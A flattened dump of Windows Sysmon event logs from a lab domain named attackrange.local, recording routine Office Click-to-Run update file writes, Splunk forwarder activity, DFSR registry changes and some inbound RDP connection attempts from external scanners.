Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\vccorlib140.dll2021-04-20 14:54:16.221 23542300x800000000000000064572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:16.284{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E9924344D87AAA063D55ACF241653DF,SHA256=14BC506DF558F27256EF7877E017CBE14F17E9D62C77330CCC9D1D8114B3310A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.217{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-26575-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.117{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-29305-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000064569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\ucrtbase.dll2021-04-20 14:54:16.221 11241100x800000000000000064568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\offfiltx.dll2021-04-20 14:54:16.221 11241100x800000000000000064567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\msvcp120.dll2021-04-20 14:54:16.221 11241100x800000000000000064566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\msgfilt.dll2021-04-20 14:54:16.221 23542300x800000000000000064565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:16.096{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B7058EDFB62B65BFC77A1B8599D76B3,SHA256=E28D8DE8BF6391D25E400444DB81E40EF2A2D155CF6D192002B6455D939E735F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049481Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:16.619{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA567DFD0A2DF58C0E1F6C9843BA217,SHA256=180E88EE82C52293F0423A218252ED117803264BD932C8C588DFA310FC7643F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:17.909{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9EF0AFAEEBCE9636C2D144609CA9727C,SHA256=D18BEA3408D694021420122191F339DA609F5E49867AA3A446A26E0651D48CC9,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000064651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:54:17.846{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\BD98497A-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_BD98497A-0000-0000-0000-100000000000.XML 13241300x800000000000000064650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:54:17.846{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\B04DA29D-EACF-4308-B648-227B5727B21E\Config SourceDWORD (0x00000001) 13241300x800000000000000064649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:54:17.846{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\B04DA29D-EACF-4308-B648-227B5727B21E\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_B04DA29D-EACF-4308-B648-227B5727B21E.XML 11241100x800000000000000064648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.674{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\msotdintl.dll2021-04-20 14:54:17.674 11241100x800000000000000064647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\LOCALDV.DLL2021-04-20 14:54:17.503 11241100x800000000000000064646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Library\SOLVER\SOLVER32.DLL2021-04-20 14:54:17.503 11241100x800000000000000064645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSYUBIN7.DLL2021-04-20 14:54:17.487 11241100x800000000000000064644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Mso30win32client.dll2021-04-20 14:54:17.471 11241100x800000000000000064643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.471{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO40UIRES.DLL2021-04-20 14:54:17.471 23542300x800000000000000064642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:17.424{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=744F94CD14FFFF12F78D1242ECF63E82,SHA256=E6A5EB037D258BDE55266B43ED74F53FBAFB249EC1AB6B82AB7DDCF8E616B5C6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSHY7FR.DLL2021-04-20 14:54:17.362 11241100x800000000000000064640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSHY7ES.DLL2021-04-20 14:54:17.362 11241100x800000000000000064639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSHY7EN.DLL2021-04-20 14:54:17.362 11241100x800000000000000064638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Mso40UIwin32client.dll2021-04-20 14:54:17.362 354300x800000000000000064637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.664{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56304-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000064636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO99LRES.DLL2021-04-20 14:54:17.268 11241100x800000000000000064635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.159{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOIDCLIL.DLL2021-04-20 14:54:17.159 11241100x800000000000000064634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.159{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOIDRES.DLL2021-04-20 14:54:17.159 11241100x800000000000000064633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.159{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSPST32.DLL2021-04-20 14:54:17.159 11241100x800000000000000064632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:17.143{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONENOTE.EXE2021-04-20 14:54:17.143 11241100x800000000000000064631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:17.143{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONENOTEM.EXE2021-04-20 14:54:17.143 11241100x800000000000000064630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\appsharingmediaprovider.dll2021-04-20 14:54:17.128 11241100x800000000000000064629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\DBGHELP.DLL2021-04-20 14:54:17.128 11241100x800000000000000064628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:17.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\1033\PortalConnect.dll2021-04-20 14:54:17.018 23542300x800000000000000049483Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:17.651{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44B1187ED76314757115F64E3A83C51C,SHA256=7359E64C6BA4B69F0F86D644C9A73C5DAD96A164E11B79EA5D32903622C7E64E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049482Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:15.491{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59084-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 11241100x800000000000000064732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.987{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-localization-l1-2-0.dll2021-04-20 14:54:18.987 11241100x800000000000000064731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.987{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONRES.DLL2021-04-20 14:54:18.987 11241100x800000000000000064730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.987{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ONINTL.DLL2021-04-20 14:54:18.987 11241100x800000000000000064729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBTRAP.DLL2021-04-20 14:54:18.971 11241100x800000000000000064728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PTXT9.DLL2021-04-20 14:54:18.971 11241100x800000000000000064727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBWZINT.DLL2021-04-20 14:54:18.971 11241100x800000000000000064726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUB6INTL.DLL2021-04-20 14:54:18.971 11241100x800000000000000064725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\xlicons.exe2021-04-20 14:54:18.878 11241100x800000000000000064724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WWINTL.DLL2021-04-20 14:54:18.878 11241100x800000000000000064723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CSS7DATA000C.DLL2021-04-20 14:54:18.878 11241100x800000000000000064722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7en.dll2021-04-20 14:54:18.878 11241100x800000000000000064721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7fr.dll2021-04-20 14:54:18.878 11241100x800000000000000064720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7es.dll2021-04-20 14:54:18.878 354300x800000000000000064719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:17.909{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57486-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000064718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:17.909{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57486-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000064717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:17.856{A7A01FEF-B626-607E-0D00-00000000BB01}1008C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57485-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local135epmap 354300x800000000000000064716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:17.856{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57485-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local135epmap 11241100x800000000000000064715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\IEAWSDC.DLL2021-04-20 14:54:18.643 11241100x800000000000000064714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOHEV.DLL2021-04-20 14:54:18.643 11241100x800000000000000064713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.628{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\visicon.exe2021-04-20 14:54:18.628 11241100x800000000000000064712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-file-l2-1-0.dll2021-04-20 14:54:18.518 11241100x800000000000000064711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\lyncDesktopResources.dll2021-04-20 14:54:18.518 11241100x800000000000000064710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ocapires.dll2021-04-20 14:54:18.518 11241100x800000000000000064709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.471{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcr110.dll2021-04-20 14:54:18.471 11241100x800000000000000064708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-processthreads-l1-1-1.dll2021-04-20 14:54:18.456 11241100x800000000000000064707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.440{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACECORE.DLL2021-04-20 14:54:18.440 11241100x800000000000000064706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.440{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEDAO.DLL2021-04-20 14:54:18.440 